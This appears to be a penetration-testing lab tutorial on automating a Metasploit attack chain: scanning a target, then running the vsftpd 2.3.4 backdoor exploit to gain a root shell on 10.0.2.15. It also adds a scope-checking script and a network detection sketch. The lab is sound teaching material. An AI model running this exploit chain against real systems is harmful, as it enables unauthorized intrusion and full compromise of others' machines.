Introduction
Welcome to this lab on automating attacks with Metasploit resource scripts. The Metasploit Framework is a powerful tool for penetration testing, but manually typing commands for each engagement can be repetitive and time-consuming. Resource scripts, which are simple text files with a .rc extension, allow you to automate these sequences of commands.
In this lab, you will learn how to create a resource script to automate a complete attack chain against a vulnerable service. This includes setting up a workspace, scanning the target, selecting an exploit, configuring it, and launching the attack. By the end of this lab, you will be able to create your own scripts to streamline your penetration testing workflows.
For this lab, we will be targeting a simulated vulnerable machine. Assume the target machine's IP address is 10.0.2.15.
Create a new file with a .rc extension
In this step, you will create the resource script file. A Metasploit resource script is simply a text file containing a list of msfconsole commands that are executed sequentially. By convention, these files have a .rc extension.
We will use the nano text editor to create a file named attack.rc in the default ~/project directory.
Open your terminal and execute the following command to create and open the new file:
nano attack.rc
This command will open an empty file in the nano editor. For now, just save the empty file and exit the editor by pressing Ctrl+X, then Y, and finally Enter. You have now created the resource script file that you will populate in the next steps.
Add a sequence of msfconsole commands to the file
In this step, you will add the initial commands to your resource script. These commands will set up a dedicated workspace for our test and run a basic Nmap scan to gather information about the target. Organizing work into workspaces is a good practice in Metasploit.
First, open the attack.rc file again using nano:
nano attack.rc
Now, add the following lines to the file. The first command creates a new workspace named vsftpd_lab, and the second command runs an Nmap scan against our target (10.0.2.15) and saves the results to the database.
workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
After adding these two lines, your attack.rc file should contain exactly the two commands shown above. Save the file and exit nano by pressing Ctrl+X, Y, and Enter.
Include commands to use an exploit, set options, and run
In this step, you will add the core attack commands to the script. We will be targeting a known vulnerability in the VSFTPD server, specifically the vsftpd_234_backdoor exploit. You will add commands to select this exploit, set the required target option, and finally, execute it.
Open the attack.rc file again with nano:
nano attack.rc
Append the following commands to the end of the file. These commands instruct Metasploit to:
use exploit/unix/ftp/vsftpd_234_backdoor: Select the specific exploit module.
set RHOSTS 10.0.2.15: Set the RHOSTS (Remote Hosts) option to our target's IP address.
exploit: Launch the attack.
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit
After adding these lines, your complete attack.rc file should now contain the following five commands:
workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit
Save the changes and exit the nano editor (Ctrl+X, Y, Enter). Your automated attack script is now complete.
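Because a resource script runs every line without prompting, a mistyped address reaches the scanner and the exploit unattended. The following pre-flight check is an added example, not part of the original lab or of Metasploit: it reads a resource script, collects the targets of db_nmap and set RHOSTS lines, and reports any that fall outside an authorized scope. The scope list, the function names and the sample script copy are assumptions made for illustration, and `<ruby>` blocks inside resource scripts are not handled.

```python
import ipaddress

# Constructed copy of the attack.rc built in this lab.
SAMPLE_RC = """\
workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit
"""
# Assumption: the authorization covers only the lab target.
AUTHORIZED_SCOPE = ["10.0.2.15/32"]
TARGET_OPTIONS = {"RHOSTS", "RHOST"}

def extract_targets(rc_text):
    """Return (line_no, target) for each address a command would touch."""
    found = []
    for line_no, raw in enumerate(rc_text.splitlines(), start=1):
        words = raw.split()
        if not words or words[0].startswith("#"):
            continue  # blank line or comment
        cmd = words[0].lower()
        if cmd in ("set", "setg") and len(words) >= 3 and words[1].upper() in TARGET_OPTIONS:
            args = words[2:]
        elif cmd == "db_nmap":
            # Non-flag words are treated as targets; a flag's own argument
            # will fail the address parse below and be reported.
            args = [w for w in words[1:] if not w.startswith("-")]
        else:
            continue
        for arg in args:
            found.extend((line_no, t) for t in arg.split(",") if t)
    return found

def out_of_scope(rc_text, scope):
    """Return the (line_no, target) pairs that are not inside the scope."""
    nets = [ipaddress.ip_network(s) for s in scope]
    violations = []
    for line_no, target in extract_targets(rc_text):
        try:
            net = ipaddress.ip_network(target, strict=False)
            ok = any(net.version == n.version and net.subnet_of(n) for n in nets)
        except ValueError:
            ok = False  # hostnames, ranges, option arguments: fail closed
        if not ok:
            violations.append((line_no, target))
    return violations

if __name__ == "__main__":
    print(out_of_scope(SAMPLE_RC, AUTHORIZED_SCOPE) or "all targets in scope")
```

Anything that does not parse as an IP address or CIDR block is reported rather than skipped, so the check errs toward stopping the run.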
Launch msfconsole with the -r flag to execute the script
In this step, you will execute the resource script you just created. The Metasploit console, msfconsole, can be launched with the -r flag followed by the path to a resource script. This tells Metasploit to execute the commands from the specified file upon startup.
Make sure you are in the ~/project directory where your attack.rc file is located. Now, run the following command in your terminal:
msfconsole -r attack.rc
This command will start the Metasploit Framework. Instead of presenting you with the usual msf6 > prompt immediately, it will begin executing each command from attack.rc one by one.
Observe the automated execution of the attack chain
In this final step, you will observe the results of your automated script. As msfconsole runs, you will see the output from each command in your attack.rc file. You will see the workspace being created, the Nmap scan running, the exploit being configured, and finally, the attack being launched.
If the attack is successful, Metasploit will open a command shell session on the target machine. You will see a message similar to this:
[*] Found shell.
[*] Command shell session 1 opened (10.0.2.4:42931 -> 10.0.2.15:6200) at 2023-10-27 10:30:00 -0400
You are now in a shell on the compromised target. To verify this, you can run a command like whoami to see which user you are running as.
whoami
The expected output should be:
root
This confirms that your automated script has successfully compromised the target and gained root access.
To clean up, type exit to close the command shell session, and then type exit again to quit msfconsole.
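The session line above shows what this attack looks like on the network: a connection to the FTP service followed by a new connection from the same source to TCP port 6200 on the target. The following detection sketch is an added example, not part of the original lab: it correlates the two events in flow records. The record format, the 60-second window, the function names and the sample flows are all constructed for illustration, and records are assumed to arrive in time order.

```python
from datetime import datetime, timedelta

# Constructed flow records: "ISO-time src_ip:src_port dst_ip:dst_port"
SAMPLE_FLOWS = """\
2023-10-27T10:29:41 10.0.2.7:51512 10.0.2.15:21
2023-10-27T10:29:58 10.0.2.4:38811 10.0.2.15:21
2023-10-27T10:30:00 10.0.2.4:42931 10.0.2.15:6200
2023-10-27T10:31:12 10.0.2.9:40110 10.0.2.15:6200
2023-10-27T10:45:00 10.0.2.7:51990 10.0.2.15:6200
"""
FTP_PORT = 21
SHELL_PORT = 6200  # port of the shell session shown in the lab output


def parse_flow(line):
    """Split one record into (timestamp, src_ip, dst_ip, dst_port)."""
    ts, src, dst = line.split()
    src_ip, _ = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src_ip, dst_ip, int(dst_port)


def correlate(flows_text, window=timedelta(seconds=60)):
    """Flag port-6200 connections that follow FTP from the same source."""
    last_ftp = {}  # (src_ip, dst_ip) -> time of most recent FTP connection
    alerts = []
    for line in flows_text.splitlines():
        if not line.strip():
            continue
        ts, src_ip, dst_ip, dst_port = parse_flow(line)
        if dst_port == FTP_PORT:
            last_ftp[(src_ip, dst_ip)] = ts
        elif dst_port == SHELL_PORT:
            seen = last_ftp.get((src_ip, dst_ip))
            if seen is not None and timedelta(0) <= ts - seen <= window:
                alerts.append((src_ip, dst_ip, ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_FLOWS):
        print("FTP followed by port 6200 connection:", alert)
```

In the sample data only the 10.0.2.4 pair is flagged; the other two port-6200 connections have no FTP connection from the same source inside the window.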
Summary
In this lab, you have successfully learned how to automate a penetration testing workflow using Metasploit resource scripts.
You started by creating a resource script file (attack.rc). Then, you populated it with a sequence of msfconsole commands to perform a full attack chain: creating a workspace, scanning the target, selecting and configuring an exploit, and finally launching the attack. You learned how to execute this script using the msfconsole -r command and observed the automated execution.
This skill is invaluable for saving time and ensuring consistency in your security assessments. You can now create more complex scripts to automate various repetitive tasks in your future engagements.


